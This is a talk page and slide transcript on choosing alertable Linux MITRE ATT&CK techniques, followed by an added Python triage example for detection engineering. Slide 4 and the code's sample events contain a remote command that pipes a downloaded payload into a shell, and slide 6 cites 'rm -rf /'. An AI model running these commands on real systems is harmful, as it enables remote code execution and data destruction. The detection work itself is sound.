Alertable Techniques for Linux using MITRE ATT&CK

Community members continually ask: should I have detection capabilities across every technique in ATT&CK? This question inevitably leads to the same conclusion: not every technique is alertable, and not all of them provide the same value for immediate detection. In this session we’ll discuss the concept of alertable detections, using Linux ATT&CK techniques as a case study. We’ll introduce decision criteria we’ve learned through experience to illustrate the challenges, and we’ll recommend specific techniques that work well with an alert-driven workflow.

Tony M Lambert

October 29, 2019

Transcript

  1. id -un: Tony Lambert, Detection Engineer/Intel, Red Canary, @ForensicITGuy
     ▪ Find & detect adversaries using data
     ▪ Recovering system administrator
     ▪ Love to teach, hate to grade homework
  2. What’s an alert?
     ▪ Notification of abnormal condition
     ▪ Requires context for triage
     ▪ Requires care and feeding for efficacy
  3. Decision Criteria for Alerts
     ▪ Time to investigate (lower is better)
     ▪ Significance of abnormality (urgent is better)
     ▪ Time to respond (lower is better)
  4. Remote Services (T1021)
     ssh … [email protected] '(curl hxxps://pastebin.com/payload | sh'
     ▪ Tune out deployment tools
     ▪ Significant for lateral movement
  5. Anything Discovery: whoami, netstat, ifconfig, etc.
     ▪ OS noise makes high volume
     ▪ Better for cluster analysis
  6. File Deletion (T1107): rm -rf /
     ▪ Probably non-functional rule
     ▪ Helpdesk will know before the alert
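An added example, not part of the deck, that applies the decision criteria from slides 3 to 6 to constructed process events: ssh spawned by a known deployment tool is tuned out, an ssh remote command that pipes a download into a shell is raised as a T1021 alert, discovery commands are counted per user for cluster analysis instead of alerting, and the literal rm -rf / rule is kept to show that it does not fire on ordinary deletions. The event tuples, the deployment-tool set and the discovery-command set are assumptions.

```python
import shlex
from collections import Counter

# Constructed sample process events, not from the deck: (user, parent process, command line).
EVENTS = [
    ("deploy", "ansible-playbook", "ssh web01 'systemctl restart nginx'"),
    ("alice", "bash", "ssh user@host '(curl https://example.invalid/payload | sh)'"),
    ("alice", "bash", "whoami"),
    ("alice", "bash", "netstat -tulpn"),
    ("alice", "bash", "ifconfig"),
    ("root", "cron", "rm -rf /tmp/build-cache"),
]

# Assumed parents that routinely spawn ssh for legitimate reasons (slide 4: tune out deployment tools).
DEPLOYMENT_TOOLS = {"ansible-playbook", "salt-ssh"}
# Assumed discovery commands (slide 5): too noisy to alert on; summarise per user for cluster analysis.
DISCOVERY = {"whoami", "netstat", "ifconfig", "id", "uname"}


def is_remote_download_exec(cmdline):
    """True when ssh runs a remote command that pipes a download into a shell.
    Option parsing is deliberately simple: tokens starting with '-' are skipped,
    the first remaining token is the host, the rest is the remote command."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return False
    rest = [a for a in argv[1:] if not a.startswith("-")]
    remote = " ".join(rest[1:])
    return "curl" in remote and "| sh" in remote


def triage(events):
    """Sort events into alerts (low investigation time, clear significance)
    and aggregate counts (high-volume discovery) following the deck's criteria."""
    alerts, discovery_by_user = [], Counter()
    for user, parent, cmdline in events:
        argv = shlex.split(cmdline)
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]
        if prog == "ssh":
            if parent in DEPLOYMENT_TOOLS:
                continue  # known deployment tool: not worth an analyst's time
            if is_remote_download_exec(cmdline):
                alerts.append(("T1021", user, cmdline))
        elif prog in DISCOVERY:
            discovery_by_user[user] += 1  # aggregate for cluster analysis, do not page anyone
        elif prog == "rm" and "-rf" in argv and "/" in argv:
            # Literal "rm -rf /" rule (slide 6): kept to show it practically never fires.
            alerts.append(("T1107", user, cmdline))
    return alerts, discovery_by_user
```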